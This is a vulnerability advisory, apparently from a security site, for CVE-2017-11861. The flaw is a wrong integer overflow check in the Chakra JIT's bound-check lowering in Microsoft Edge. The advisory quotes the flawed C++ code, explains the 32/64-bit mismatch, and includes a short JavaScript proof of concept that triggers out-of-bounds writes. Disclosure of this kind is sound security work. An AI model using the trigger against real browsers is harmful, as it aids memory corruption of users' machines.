Microsoft Edge Charka JIT Incorrect Check

2017.11.16
Credit: lokihardt
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 7.6/10
Impact Subscore: 10/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Microsoft Edge: Chakra: JIT: Incorrect integer overflow check in Lowerer::LowerBoundCheck CVE-2017-11861 Here's a snippet of the method. void Lowerer::LowerBoundCheck(IR::Instr *const instr) { ... if(rightOpnd->IsIntConstOpnd()) { IntConstType newOffset; if(!IntConstMath::Add(offset, rightOpnd->AsIntConstOpnd()->GetValue(), &newOffset)) <<--- (a) { offset = newOffset; rightOpnd = nullptr; offsetOpnd = nullptr; } } ... if(!rightOpnd) { rightOpnd = IR::IntConstOpnd::New(offset, TyInt32, func); } } At (a), it uses "IntConstMath::Add" to check integer overflow. But the size of IntConstType equals to the size of pointer, and the "offset" variable is used as a 32-bit integer. So it may fail to check integer overflow on 64-bit system. PoC: function f() { let arr = new Uint32Array(0x1000); for (let i = 0; i < 0x7fffffff;) { arr[++i] = 0x1234; } } f(); This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: lokihardt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top